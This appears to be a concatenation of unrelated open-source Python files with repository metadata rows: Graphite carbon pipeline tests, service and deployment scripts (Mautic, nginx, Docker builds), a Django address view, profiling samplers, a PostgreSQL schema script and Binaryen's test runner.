from carbon import events, state
from carbon.pipeline import Processor, run_pipeline
from carbon.service import CarbonRootService, setupPipeline
from carbon.tests.util import TestSettings
class TestSetupPipeline(TestCase):
def setUp(self):
self.settings = TestSettings()
self.root_service_mock = Mock(CarbonRootService)
self.call_when_running_patch = patch('twisted.internet.reactor.callWhenRunning')
self.call_when_running_mock = self.call_when_running_patch.start()
def tearDown(self):
self.call_when_running_patch.stop()
state.pipeline_processors = []
events.metricReceived.handlers = []
events.metricGenerated.handlers = []
def test_run_pipeline_chained_to_metric_received(self):
setupPipeline([], self.root_service_mock, self.settings)
self.assertTrue(run_pipeline in events.metricReceived.handlers)
def test_run_pipeline_chained_to_metric_generated(self):
setupPipeline([], self.root_service_mock, self.settings)
self.assertTrue(run_pipeline in events.metricGenerated.handlers)
@patch('carbon.service.setupAggregatorProcessor')
def test_aggregate_processor_set_up(self, setup_mock):
setupPipeline(['aggregate'], self.root_service_mock, self.settings)
setup_mock.assert_called_once_with(self.root_service_mock, self.settings)
@patch('carbon.service.setupRewriterProcessor')
def test_rewrite_processor_set_up(self, setup_mock):
setupPipeline(['rewrite:pre'], self.root_service_mock, self.settings)
setup_mock.assert_called_once_with(self.root_service_mock, self.settings)
@patch('carbon.service.setupRelayProcessor')
def test_relay_processor_set_up(self, setup_mock):
setupPipeline(['relay'], self.root_service_mock, self.settings)
setup_mock.assert_called_once_with(self.root_service_mock, self.settings)
@patch('carbon.service.setupWriterProcessor')
def test_write_processor_set_up(self, setup_mock):
setupPipeline(['write'], self.root_service_mock, self.settings)
setup_mock.assert_called_once_with(self.root_service_mock, self.settings)
def test_unknown_processor_raises_value_error(self):
self.assertRaises(
exceptions.ValueError, setupPipeline, ['foo'], self.root_service_mock, self.settings)
@patch('carbon.service.setupRewriterProcessor', new=Mock())
def test_parses_processor_args(self):
#XXX Patch doesnt work on this import directly
rewrite_mock = Mock()
Processor.plugins['rewrite'] = rewrite_mock
setupPipeline(['rewrite:pre'], self.root_service_mock, self.settings)
rewrite_mock.assert_called_once_with('pre')
def test_schedules_pipeline_ready(self):
setupPipeline([], self.root_service_mock, self.settings)
self.assertTrue(self.call_when_running_mock.called)
| apache-2.0 | -5,603,275,408,449,106,000 | 41.727273 | 93 | 0.753546 | false | 3.624679 | true | false | false |
Barmaley13/BA-Software | gate/main.py | 1 | 3867 | """
Some Main Functions
"""
### INCLUDES ###
import os
import bottle
import logging
from tornado import ioloop
from .common import CWD, TPL_FOLDER, OPTIONS_PARSER
from .system import SystemSettings
from .web import WebServer
from .web.socket import WebsocketManager
from .sleepy_mesh import SleepyMeshManager
### CONSTANTS ###
AES_RESET_DELAY = 3.0 # seconds
### MAIN FUNCTION ###
def main(system_options):
""" Main function """
# Make some variables accessible to html templates
global manager, system_settings, pages, users, snmp_agents, snmp_commands, snmp_traps
# Set current working directory
os.chdir(CWD)
# print('CWD: {}'.format(CWD))
# Set default logging across all modules
logging.basicConfig(level=logging.ERROR)
# Set default bottle Template Path
# del bottle.TEMPLATE_PATH[:]
bottle.TEMPLATE_PATH.append(TPL_FOLDER)
# Create and start Sleepy Mesh Manager (System Settings start modbus if it is enable)
system_settings = SystemSettings(system_options)
manager = SleepyMeshManager(
system_settings=system_settings,
websocket=WebsocketManager(),
snmp_websocket=WebsocketManager()
)
manager.start()
# Forward SNMP Agents/Commands/Traps to templates
snmp_agents = manager.snmp_server.agents
snmp_commands = manager.snmp_server.commands
snmp_traps = manager.snmp_server.traps
# Create Web Server
# Web server is a loop, sleepy mesh manager scheduler is based on the same loop as well
web_server = WebServer(manager)
# Share some variables with html templates variables
pages = web_server.pages
users = web_server.pages.users
# Start Web Server
web_server.start()
# If we are here it means that program has been terminated, kill modbus server
manager.modbus_server.stop()
manager.snmp_server.stop()
def reset_aes_settings(reset_complete_callback=None):
""" Reset AES settings (if needed) """
global manager
# Set current working directory
os.chdir(CWD)
# print('CWD: {}'.format(CWD))
# Set default logging across all modules
logging.basicConfig(level=logging.ERROR)
# Create System Options
(system_options, args) = OPTIONS_PARSER.parse_args()
# Disable modbus and snmp servers
system_options.modbus_enable = False
system_options.snmp_enable = False
# Create and start Sleepy Mesh Manager
system_settings = SystemSettings(system_options)
manager = SleepyMeshManager(
system_settings=system_settings,
websocket=WebsocketManager(),
snmp_websocket=WebsocketManager()
)
# Dynamically creating AES reset function so we can incorporate delay
def _aes_reset():
""" Nested AES Reset """
# Dynamically creating reset complete callback
def _reset_complete_callback():
""" Nested Reset Complete Callback """
# Stopping Scheduler
manager.stop_scheduler()
# Stopping Tornado Server
ioloop.IOLoop.instance().stop()
if reset_complete_callback is not None:
reset_complete_callback()
manager.reset_network(complete_callback=_reset_complete_callback)
# Monkey Patching Scheduler
old_start_scheduler = manager.init_scheduler
def monkey_patched_init_scheduler():
""" Monkey patching Init Scheduler to include AES Reset """
old_start_scheduler()
manager.bridge.schedule(AES_RESET_DELAY, _aes_reset)
manager.init_scheduler = monkey_patched_init_scheduler
# Delete all active nodes
nodes = manager.platforms.select_nodes('active').values()
for node in nodes:
manager.platforms.delete_node(node)
node.delete()
# Starting Scheduler
manager.start()
# Starting Tornado
ioloop.IOLoop.instance().start()
| gpl-3.0 | 6,033,919,358,536,055,000 | 28.295455 | 91 | 0.683993 | false | 4.171521 | false | false | false |
nicolas-petit/clouder | clouder_template_mautic/template.py | 1 | 3846 | # -*- coding: utf-8 -*-
##############################################################################
#
# Author: Yannick Buron
# Copyright 2015, TODAY Clouder SASU
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License with Attribution
# clause as published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License with
# Attribution clause along with this program. If not, see
# <http://www.gnu.org/licenses/>.
#
##############################################################################
from openerp import models, api, modules
class ClouderContainer(models.Model):
"""
Add methods to manage the mautic specificities.
"""
_inherit = 'clouder.container'
@api.multi
def deploy_post(self):
super(ClouderContainer, self).deploy_post()
if self.application_id.type_id.name == 'mautic':
package_name = self.image_id.current_version + '.zip'
self.execute(
['wget', '-q', 'https://s3.amazonaws.com/mautic/releases/' + package_name,
], path='/var/www/', username='www-data')
self.execute(['unzip', package_name],
path='/var/www', username='www-data')
self.execute(['rm', package_name],
path='/var/www', username='www-data')
#INSTALLATION FROM SOURCE
# self.execute(
# ['git', 'clone', '--branch', self.image_id.current_version, 'https://github.com/mautic/mautic.git'
# ], path='/var/www/', username='www-data')
# self.execute(
# ['composer', 'install'], path='/var/www/mautic', username='www-data')
class ClouderBase(models.Model):
"""
Add methods to manage the mautic specificities.
"""
_inherit = 'clouder.base'
@api.multi
def deploy_build(self):
"""
Configure nginx.
"""
res = super(ClouderBase, self).deploy_build()
if self.application_id.type_id.name == 'mautic':
config_file = '/etc/nginx/sites-available/' + self.fullname
self.container_id.send(
modules.get_module_path('clouder_template_mautic') +
'/res/nginx.config', config_file)
self.container_id.execute(['sed', '-i', '"s/BASE/' + self.name + '/g"',
config_file])
self.container_id.execute(['sed', '-i',
'"s/DOMAIN/' + self.domain_id.name + '/g"',
config_file])
self.container_id.execute(['ln', '-s',
'/etc/nginx/sites-available/' + self.fullname,
'/etc/nginx/sites-enabled/' + self.fullname])
self.container_id.execute(['/etc/init.d/nginx', 'reload'])
return res
@api.multi
def purge_post(self):
"""
Purge from nginx configuration.
"""
super(ClouderBase, self).purge_post()
if self.application_id.type_id.name == 'mautic':
self.container_id.execute(['rm', '-rf',
'/etc/nginx/sites-enabled/' + self.fullname])
self.container_id.execute([
'rm', '-rf', '/etc/nginx/sites-available/' + self.fullname])
self.container_id.execute(['/etc/init.d/nginx', 'reload'])
| gpl-3.0 | -5,302,512,788,083,574,000 | 38.649485 | 124 | 0.541082 | false | 4.087141 | true | false | false |
bioothod/zbuilder | zbuilder.py | 1 | 7249 | #!/usr/bin/python
import argparse
import docker
import json
import logging
import os
import shutil
import sys
logging.basicConfig(format='%(asctime)s %(levelname)s: %(message)s', level=logging.INFO)
class zbuilder():
def __init__(self, config):
js = json.load(config)
self.docker_files = []
self.build_succeeded_file = "/tmp/build_succeeded"
packages = js.get("packages")
if not packages:
logging.error("core: there is no 'packages' object, nothing to build")
return
logging.info("Starting parse different build types")
for package_type, package in packages.items():
images = []
if package_type == "deb":
img = js.get("deb-images")
if img:
images += img
elif package_type == "rpm":
img = js.get("rpm-images")
if img:
images += img
else:
logging.error("%s: unsupported package type", package_type)
continue
logging.info("%s: starting to parse commands", package_type)
pre_build_commands = package.get("pre-build-commands")
build_commands = package.get("build-commands")
if build_commands:
build_commands.append("echo success > %s" % (self.build_succeeded_file))
post_build = package.get("post-build-commands")
final_commands = {}
if post_build:
pbs = post_build.get("success")
if pbs:
final_commands["success"] = pbs
pbf = post_build.get("fail")
if pbf:
final_commands["fail"] = pbf
pba = post_build.get("always")
if pba:
final_commands["always"] = pba
sources = package.get("sources")
if not sources:
logging.error("%s: there is no 'sources' object, nothing to build", package_type)
break
for name, source in sources.items():
logging.info("%s/%s: starting to parse source", package_type, name)
include_images = source.get("include-images")
if include_images:
images += include_images
exclude_images = source.get("exclude-images")
if exclude_images:
tmp = []
for x in images:
if x in exclude_images:
continue
tmp.append(x)
images = tmp
logging.info("%s/%s: images: %s", package_type, name, ', '.join(images))
fetch_commands = []
try:
stype = source["type"]
repo = source["repository"]
branch = source.get("branch", "master")
if stype == "git":
fetch_commands.append("rm -rf %s" % (name))
fetch_commands.append("git clone %s %s" % (repo, name))
fetch_commands.append("cd %s" % (name))
fetch_commands.append("git checkout %s" % (branch))
build_commands.append("cd %s" % (name))
else:
logging.error("%s/%s: unsupported source type '%s'", package_type, name, stype)
continue
except Exception as e:
logging.error("%s/%s: invalid source: %s", package_type, name, e)
continue
logging.info("%s/%s: fetch commands: %s", package_type, name, ', '.join(fetch_commands))
commands = []
try:
commands.append(pre_build_commands)
commands.append(fetch_commands)
commands.append(build_commands)
except Exception as e:
logging.notice("%s/%s: could not append command: %s", package_type, name, e)
for image in images:
df = self.generate_dockerfile(name, image, commands, final_commands)
self.docker_files.append(df)
def generate_dockerfile(self, name, image, commands, final_commands):
df = "Dockerfile.%s.%s" % (name, image)
with open(df, 'w+') as f:
f.write("FROM %s\n" % (image))
f.write("ENV ZBUILDER_IMAGE=%s ZBUILDER_NAME=%s DEBIAN_FRONTEND=noninteractive\n" % (image, name))
f.write("ADD conf.d conf.d\n")
for cmd_set in commands:
cs = "RUN %s\n" % (' && \\\n'.join(cmd_set))
f.write(cs)
success = final_commands.get("success")
if success:
cs = "RUN test -f %s && \\\n %s\n" % (self.build_succeeded_file, ' && \\\n'.join(success))
f.write(cs)
fail = final_commands.get("fail")
if fail:
cs = "RUN test -f %s || \\\n %s\n" % (self.build_succeeded_file, ' && \\\n'.join(fail))
f.write(cs)
always = final_commands.get("always")
if always:
cs = "RUN %s\n" % ' && \\\n'.join(always)
f.write(cs)
return df
def run(self, name = None, build_dir = '.'):
c = docker.Client(base_url='unix://var/run/docker.sock')
for path in self.docker_files:
if name and not name in path:
continue
try:
shutil.rmtree(path="%s/" % build_dir, ignore_errors=True)
os.mkdir("%s/" % build_dir)
shutil.copy(path, "%s/" % build_dir)
shutil.copytree("conf.d", "%s/conf.d" % build_dir)
except Exception as e:
logging.error("Could not copy local content to destination build dir %s: %s",
build_dir, e)
continue
with open("%s.build.log" % (path), "w+") as out:
response = c.build(path=build_dir, dockerfile=path, rm=False, pull=False, forcerm=False)
for r in response:
out.write(r)
logging.info("%s: %s", path, r)
if __name__ == '__main__':
bparser = argparse.ArgumentParser(description='Builder arguments.', add_help=True)
bparser.add_argument("--conf", dest='conf', action='store', type=argparse.FileType('r'),
required=True, help='Input config file.')
bparser.add_argument("--build-dir", dest='build_dir', action='store', default=".",
help='Local directory where build process will run.')
bparser.add_argument("--image", dest='image', action='store',
help='Build only images containing this substring.')
args = bparser.parse_args()
try:
zb = zbuilder(config=args.conf)
try:
zb.run(name=args.image, build_dir=args.build_dir)
except Exception as e:
logging.error("Could not run build, name: %s: %s", args.image, e)
except Exception as e:
logging.error("Could not create zbuilder object: %s", e)
| apache-2.0 | 5,666,204,978,273,247,000 | 37.973118 | 110 | 0.497448 | false | 4.241662 | false | false | false |
libretees/libreshop | libreshop/addresses/views.py | 1 | 1420 | import logging
from django.contrib.gis.geoip2 import GeoIP2
from django.views.generic import FormView
from ipware.ip import get_real_ip
from .forms import AddressForm
# Initialize logger.
logger = logging.getLogger(__name__)
# Create your views here.
class AddressFormView(FormView):
template_name = 'addresses/address_form.html'
success_url = '/'
def get_form(self):
'''
Get the Form object that will be supplied to the FormView's context.
'''
# Instantiate Form.
form = AddressForm(**self.get_form_kwargs())
# Determine the IP address associated to the HTTP Request.
ip_address = get_real_ip(self.request)
# Populate the form's `country` field with the user's apparent location.
if ip_address and not form.is_bound:
geo_ip2 = GeoIP2()
location = geo_ip2.country(ip_address)
form.fields['country'].initial = location['country_code']
return form
class ShippingAddressFormView(AddressFormView):
def form_valid(self, form):
self.request.session['shipping_address'] = form.cleaned_data
return super(ShippingAddressFormView, self).form_valid(form)
class BillingAddressFormView(AddressFormView):
def form_valid(self, form):
self.request.session['billing_address'] = form.cleaned_data
return super(BillingAddressFormView, self).form_valid(form)
| gpl-3.0 | -5,674,709,576,269,259,000 | 29.869565 | 80 | 0.680986 | false | 3.955432 | false | false | false |
what-studio/profiling | profiling/sampling/samplers.py | 1 | 3407 | # -*- coding: utf-8 -*-
"""
profiling.sampling.samplers
~~~~~~~~~~~~~~~~~~~~~~~~~~~
:copyright: (c) 2014-2017, What! Studio
:license: BSD, see LICENSE for more details.
"""
from __future__ import absolute_import
import functools
import signal
import sys
import threading
import weakref
import six.moves._thread as _thread
from profiling.utils import deferral, Runnable, thread_clock
__all__ = ['Sampler', 'ItimerSampler', 'TracingSampler']
INTERVAL = 1e-3 # 1ms
class Sampler(Runnable):
"""The base class for samplers."""
#: Sampling interval.
interval = INTERVAL
def __init__(self, interval=INTERVAL):
self.interval = interval
class ItimerSampler(Sampler):
"""Uses ``signal.ITIMER_PROF`` to sample running frames.
.. note::
``signal.SIGPROF`` is triggeres by only the main thread. If you need
sample multiple threads, use :class:`TracingSampler` instead.
"""
def handle_signal(self, profiler, signum, frame):
profiler.sample(frame)
def run(self, profiler):
weak_profiler = weakref.proxy(profiler)
handle = functools.partial(self.handle_signal, weak_profiler)
t = self.interval
with deferral() as defer:
prev_handle = signal.signal(signal.SIGPROF, handle)
if prev_handle == signal.SIG_DFL:
# sometimes the process receives SIGPROF although the sampler
# unsets the itimer. If the previous handler was SIG_DFL, the
# process will crash when received SIGPROF. To prevent this
# risk, it makes the process to ignore SIGPROF when it isn't
# running if the previous handler was SIG_DFL.
prev_handle = signal.SIG_IGN
defer(signal.signal, signal.SIGPROF, prev_handle)
prev_itimer = signal.setitimer(signal.ITIMER_PROF, t, t)
defer(signal.setitimer, signal.ITIMER_PROF, *prev_itimer)
yield
class TracingSampler(Sampler):
"""Uses :func:`sys.setprofile` and :func:`threading.setprofile` to sample
running frames per thread. It can be used at systems which do not support
profiling signals.
Just like :class:`profiling.tracing.timers.ThreadTimer`, `Yappi`_ is
required for earlier than Python 3.3.
.. _Yappi: https://code.google.com/p/yappi/
"""
def __init__(self, *args, **kwargs):
super(TracingSampler, self).__init__(*args, **kwargs)
self.sampled_times = {}
self.counter = 0
def _profile(self, profiler, frame, event, arg):
t = thread_clock()
thread_id = _thread.get_ident()
sampled_at = self.sampled_times.get(thread_id, 0)
if t - sampled_at < self.interval:
return
self.sampled_times[thread_id] = t
profiler.sample(frame)
self.counter += 1
if self.counter % 10000 == 0:
self._clear_for_dead_threads()
def _clear_for_dead_threads(self):
for thread_id in sys._current_frames().keys():
self.sampled_times.pop(thread_id, None)
def run(self, profiler):
profile = functools.partial(self._profile, profiler)
with deferral() as defer:
sys.setprofile(profile)
defer(sys.setprofile, None)
threading.setprofile(profile)
defer(threading.setprofile, None)
yield
| bsd-3-clause | -1,046,786,313,325,832,400 | 29.693694 | 78 | 0.6199 | false | 3.858437 | false | false | false |
tmrts/Solomon | config/schema.py | 1 | 2279 | #!/usr/bin/python
# -*- coding: utf-8 -*-
import psycopg2
import sys
con = None
try:
con = psycopg2.connect(host="localhost", dbname="solomon_db", user="solomon_user", password="solomon")
cur = con.cursor()
cur.execute('CREATE EXTENSION IF NOT EXISTS "uuid-ossp"')
cur.execute('DROP TABLE IF EXISTS log_visit')
cur.execute(r'''CREATE TABLE log_visit(visitor_number SERIAL NOT NULL,
visitor_id UUID NOT NULL PRIMARY KEY,
visitor_country TEXT NOT NULL,
visitor_city TEXT NOT NULL,
visitor_first_action_time TIMESTAMP WITH TIME ZONE NOT NULL,
visitor_last_action_time TIMESTAMP WITH TIME ZONE NOT NULL,
visitor_returning BOOLEAN NOT NULL,
visit_count SMALLINT NOT NULL,
referer_url TEXT,
referer_keyword TEXT,
config_os CHAR(10) NOT NULL,
config_browser_name CHAR(15) NOT NULL,
config_browser_version CHAR(20) NOT NULL,
config_resolution CHAR(9) NOT NULL,
location_ip CIDR
)''')
cur.execute('DROP TABLE IF EXISTS log_metrics')
cur.execute(r'''CREATE TABLE log_metrics(daily_date DATE NOT NULL PRIMARY KEY DEFAULT CURRENT_DATE,
daily_bit_array BIT VARYING NOT NULL DEFAULT '0'
)''')
cur.execute('DROP TABLE IF EXISTS log_websocket')
cur.execute(r'''CREATE TABLE log_websocket(websocket_use_id SERIAL NOT NULL PRIMARY KEY,
visitor_id UUID NOT NULL REFERENCES log_visit(visitor_id)
)''')
con.commit()
finally:
if con:
con.close()
| gpl-2.0 | 8,207,408,570,716,270,000 | 38.696429 | 106 | 0.442299 | false | 5.324766 | false | true | false |
WebAssembly/binaryen | check.py | 2 | 16499 | #!/usr/bin/env python3
#
# Copyright 2015 WebAssembly Community Group participants
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import glob
import os
import subprocess
import sys
import unittest
from collections import OrderedDict
from scripts.test import binaryenjs
from scripts.test import lld
from scripts.test import shared
from scripts.test import support
from scripts.test import wasm2js
from scripts.test import wasm_opt
def get_changelog_version():
with open(os.path.join(shared.options.binaryen_root, 'CHANGELOG.md')) as f:
lines = f.readlines()
lines = [l for l in lines if len(l.split()) == 1]
lines = [l for l in lines if l.startswith('v')]
version = lines[0][1:]
print("Parsed CHANGELOG.md version: %s" % version)
return int(version)
def run_version_tests():
print('[ checking --version ... ]\n')
not_executable_suffix = ['.txt', '.js', '.ilk', '.pdb', '.dll', '.wasm', '.manifest', 'binaryen-lit']
bin_files = [os.path.join(shared.options.binaryen_bin, f) for f in os.listdir(shared.options.binaryen_bin)]
executables = [f for f in bin_files if os.path.isfile(f) and not any(f.endswith(s) for s in not_executable_suffix)]
executables = sorted(executables)
assert len(executables)
changelog_version = get_changelog_version()
for e in executables:
print('.. %s --version' % e)
out, err = subprocess.Popen([e, '--version'],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE).communicate()
out = out.decode('utf-8')
err = err.decode('utf-8')
assert len(err) == 0, 'Expected no stderr, got:\n%s' % err
assert os.path.basename(e).replace('.exe', '') in out, 'Expected version to contain program name, got:\n%s' % out
assert len(out.strip().splitlines()) == 1, 'Expected only version info, got:\n%s' % out
parts = out.split()
assert parts[1] == 'version'
version = int(parts[2])
assert version == changelog_version
def run_wasm_dis_tests():
print('\n[ checking wasm-dis on provided binaries... ]\n')
for t in shared.get_tests(shared.options.binaryen_test, ['.wasm']):
print('..', os.path.basename(t))
cmd = shared.WASM_DIS + [t]
if os.path.isfile(t + '.map'):
cmd += ['--source-map', t + '.map']
actual = support.run_command(cmd)
shared.fail_if_not_identical_to_file(actual, t + '.fromBinary')
# also verify there are no validation errors
def check():
cmd = shared.WASM_OPT + [t, '-all']
support.run_command(cmd)
shared.with_pass_debug(check)
def run_crash_tests():
print("\n[ checking we don't crash on tricky inputs... ]\n")
for t in shared.get_tests(shared.get_test_dir('crash'), ['.wast', '.wasm']):
print('..', os.path.basename(t))
cmd = shared.WASM_OPT + [t]
# expect a parse error to be reported
support.run_command(cmd, expected_err='parse exception:', err_contains=True, expected_status=1)
def run_dylink_tests():
print("\n[ we emit dylink sections properly... ]\n")
dylink_tests = glob.glob(os.path.join(shared.options.binaryen_test, 'dylib*.wasm'))
for t in sorted(dylink_tests):
print('..', os.path.basename(t))
cmd = shared.WASM_OPT + [t, '-o', 'a.wasm']
support.run_command(cmd)
with open('a.wasm', 'rb') as output:
index = output.read().find(b'dylink')
print(' ', index)
assert index == 11, 'dylink section must be first, right after the magic number etc.'
def run_ctor_eval_tests():
print('\n[ checking wasm-ctor-eval... ]\n')
for t in shared.get_tests(shared.get_test_dir('ctor-eval'), ['.wast', '.wasm']):
print('..', os.path.basename(t))
ctors = open(t + '.ctors').read().strip()
cmd = shared.WASM_CTOR_EVAL + [t, '-all', '-o', 'a.wat', '-S', '--ctors', ctors]
support.run_command(cmd)
actual = open('a.wat').read()
out = t + '.out'
shared.fail_if_not_identical_to_file(actual, out)
def run_wasm_metadce_tests():
print('\n[ checking wasm-metadce ]\n')
for t in shared.get_tests(shared.get_test_dir('metadce'), ['.wast', '.wasm']):
print('..', os.path.basename(t))
graph = t + '.graph.txt'
cmd = shared.WASM_METADCE + [t, '--graph-file=' + graph, '-o', 'a.wat', '-S', '-all']
stdout = support.run_command(cmd)
expected = t + '.dced'
with open('a.wat') as seen:
shared.fail_if_not_identical_to_file(seen.read(), expected)
shared.fail_if_not_identical_to_file(stdout, expected + '.stdout')
def run_wasm_reduce_tests():
if not shared.has_shell_timeout():
print('\n[ skipping wasm-reduce testcases]\n')
return
print('\n[ checking wasm-reduce testcases]\n')
# fixed testcases
for t in shared.get_tests(shared.get_test_dir('reduce'), ['.wast']):
print('..', os.path.basename(t))
# convert to wasm
support.run_command(shared.WASM_AS + [t, '-o', 'a.wasm', '-all'])
support.run_command(shared.WASM_REDUCE + ['a.wasm', '--command=%s b.wasm --fuzz-exec -all ' % shared.WASM_OPT[0], '-t', 'b.wasm', '-w', 'c.wasm', '--timeout=4'])
expected = t + '.txt'
support.run_command(shared.WASM_DIS + ['c.wasm', '-o', 'a.wat'])
with open('a.wat') as seen:
shared.fail_if_not_identical_to_file(seen.read(), expected)
# run on a nontrivial fuzz testcase, for general coverage
# this is very slow in ThreadSanitizer, so avoid it there
if 'fsanitize=thread' not in str(os.environ):
print('\n[ checking wasm-reduce fuzz testcase ]\n')
# TODO: re-enable multivalue once it is better optimized
support.run_command(shared.WASM_OPT + [os.path.join(shared.options.binaryen_test, 'signext.wast'), '-ttf', '-Os', '-o', 'a.wasm', '--detect-features', '--disable-multivalue'])
before = os.stat('a.wasm').st_size
support.run_command(shared.WASM_REDUCE + ['a.wasm', '--command=%s b.wasm --fuzz-exec --detect-features' % shared.WASM_OPT[0], '-t', 'b.wasm', '-w', 'c.wasm'])
after = os.stat('c.wasm').st_size
# This number is a custom threshold to check if we have shrunk the
# output sufficiently
assert after < 0.85 * before, [before, after]
def run_spec_tests():
print('\n[ checking wasm-shell spec testcases... ]\n')
for wast in shared.options.spec_tests:
base = os.path.basename(wast)
print('..', base)
# windows has some failures that need to be investigated
if base == 'names.wast' and shared.skip_if_on_windows('spec: ' + base):
continue
def run_spec_test(wast):
cmd = shared.WASM_SHELL + [wast]
output = support.run_command(cmd, stderr=subprocess.PIPE)
# filter out binaryen interpreter logging that the spec suite
# doesn't expect
filtered = [line for line in output.splitlines() if not line.startswith('[trap')]
return '\n'.join(filtered) + '\n'
def run_opt_test(wast):
# check optimization validation
cmd = shared.WASM_OPT + [wast, '-O', '-all']
support.run_command(cmd)
def check_expected(actual, expected):
if expected and os.path.exists(expected):
expected = open(expected).read()
print(' (using expected output)')
actual = actual.strip()
expected = expected.strip()
if actual != expected:
shared.fail(actual, expected)
expected = os.path.join(shared.get_test_dir('spec'), 'expected-output', base + '.log')
# some spec tests should fail (actual process failure, not just assert_invalid)
try:
actual = run_spec_test(wast)
except Exception as e:
if ('wasm-validator error' in str(e) or 'parse exception' in str(e)) and '.fail.' in base:
print('<< test failed as expected >>')
continue # don't try all the binary format stuff TODO
else:
shared.fail_with_error(str(e))
check_expected(actual, expected)
# skip binary checks for tests that reuse previous modules by name, as that's a wast-only feature
if 'exports.wast' in base: # FIXME
continue
run_spec_test(wast)
# check binary format. here we can verify execution of the final
# result, no need for an output verification
# some wast files cannot be split:
# * comments.wast: contains characters that are not valid utf-8,
# so our string splitting code fails there
# FIXME Remove reference type tests from this list after nullref is
# implemented in V8
if base not in ['comments.wast', 'ref_null.wast', 'ref_is_null.wast', 'ref_func.wast', 'old_select.wast']:
split_num = 0
actual = ''
with open('spec.wast', 'w') as transformed_spec_file:
for module, asserts in support.split_wast(wast):
print(' testing split module', split_num)
split_num += 1
support.write_wast('split.wast', module, asserts)
run_opt_test('split.wast') # also that our optimizer doesn't break on it
result_wast_file = shared.binary_format_check('split.wast', verify_final_result=False, original_wast=wast)
with open(result_wast_file) as f:
result_wast = f.read()
# add the asserts, and verify that the test still passes
transformed_spec_file.write(result_wast + '\n' + '\n'.join(asserts))
# compare all the outputs to the expected output
actual = run_spec_test('spec.wast')
check_expected(actual, os.path.join(shared.get_test_dir('spec'), 'expected-output', base + '.log'))
def run_validator_tests():
print('\n[ running validation tests... ]\n')
# Ensure the tests validate by default
cmd = shared.WASM_AS + [os.path.join(shared.get_test_dir('validator'), 'invalid_export.wast'), '-o', 'a.wasm']
support.run_command(cmd)
cmd = shared.WASM_AS + [os.path.join(shared.get_test_dir('validator'), 'invalid_import.wast'), '-o', 'a.wasm']
support.run_command(cmd)
cmd = shared.WASM_AS + ['--validate=web', os.path.join(shared.get_test_dir('validator'), 'invalid_export.wast'), '-o', 'a.wasm']
support.run_command(cmd, expected_status=1)
cmd = shared.WASM_AS + ['--validate=web', os.path.join(shared.get_test_dir('validator'), 'invalid_import.wast'), '-o', 'a.wasm']
support.run_command(cmd, expected_status=1)
cmd = shared.WASM_AS + ['--validate=none', os.path.join(shared.get_test_dir('validator'), 'invalid_return.wast'), '-o', 'a.wasm']
support.run_command(cmd)
cmd = shared.WASM_AS + [os.path.join(shared.get_test_dir('validator'), 'invalid_number.wast'), '-o', 'a.wasm']
support.run_command(cmd, expected_status=1)
def run_example_tests():
print('\n[ checking native example testcases...]\n')
if not shared.NATIVECC or not shared.NATIVEXX:
shared.fail_with_error('Native compiler (e.g. gcc/g++) was not found in PATH!')
return
# windows + gcc will need some work
if shared.skip_if_on_windows('example'):
return
for t in shared.get_tests(shared.get_test_dir('example')):
output_file = 'example'
cmd = ['-I' + os.path.join(shared.options.binaryen_root, 't'), '-g', '-pthread', '-o', output_file]
if not t.endswith(('.c', '.cpp')):
continue
src = os.path.join(shared.get_test_dir('example'), t)
expected = os.path.join(shared.get_test_dir('example'), '.'.join(t.split('.')[:-1]) + '.txt')
# build the C file separately
libpath = shared.options.binaryen_lib
extra = [shared.NATIVECC, src, '-c', '-o', 'example.o',
'-I' + os.path.join(shared.options.binaryen_root, 'src'), '-g', '-L' + libpath, '-pthread']
if src.endswith('.cpp'):
extra += ['-std=c++' + str(shared.cxx_standard)]
if os.environ.get('COMPILER_FLAGS'):
for f in os.environ.get('COMPILER_FLAGS').split(' '):
extra.append(f)
print('build: ', ' '.join(extra))
subprocess.check_call(extra)
# Link against the binaryen C library DSO, using an executable-relative rpath
cmd = ['example.o', '-L' + libpath, '-lbinaryen'] + cmd + ['-Wl,-rpath,' + libpath]
print(' ', t, src, expected)
if os.environ.get('COMPILER_FLAGS'):
for f in os.environ.get('COMPILER_FLAGS').split(' '):
cmd.append(f)
cmd = [shared.NATIVEXX, '-std=c++' + str(shared.cxx_standard)] + cmd
print('link: ', ' '.join(cmd))
subprocess.check_call(cmd)
print('run...', output_file)
actual = subprocess.check_output([os.path.abspath(output_file)]).decode('utf-8')
os.remove(output_file)
shared.fail_if_not_identical_to_file(actual, expected)
def run_unittest():
print('\n[ checking unit tests...]\n')
# equivalent to `python -m unittest discover -s ./test -v`
suite = unittest.defaultTestLoader.discover(os.path.dirname(shared.options.binaryen_test))
result = unittest.TextTestRunner(verbosity=2, failfast=shared.options.abort_on_first_failure).run(suite)
shared.num_failures += len(result.errors) + len(result.failures)
if shared.options.abort_on_first_failure and shared.num_failures:
raise Exception("unittest failed")
def run_lit():
def run():
lit_script = os.path.join(shared.options.binaryen_bin, 'binaryen-lit')
lit_tests = os.path.join(shared.options.binaryen_root, 'test', 'lit')
# lit expects to be run as its own executable
cmd = [sys.executable, lit_script, lit_tests, '-vv']
result = subprocess.run(cmd)
if result.returncode != 0:
shared.num_failures += 1
if shared.options.abort_on_first_failure and shared.num_failures:
raise Exception("lit test failed")
shared.with_pass_debug(run)
TEST_SUITES = OrderedDict([
('version', run_version_tests),
('wasm-opt', wasm_opt.test_wasm_opt),
('wasm-dis', run_wasm_dis_tests),
('crash', run_crash_tests),
('dylink', run_dylink_tests),
('ctor-eval', run_ctor_eval_tests),
('wasm-metadce', run_wasm_metadce_tests),
('wasm-reduce', run_wasm_reduce_tests),
('spec', run_spec_tests),
('lld', lld.test_wasm_emscripten_finalize),
('wasm2js', wasm2js.test_wasm2js),
('validator', run_validator_tests),
('example', run_example_tests),
('unit', run_unittest),
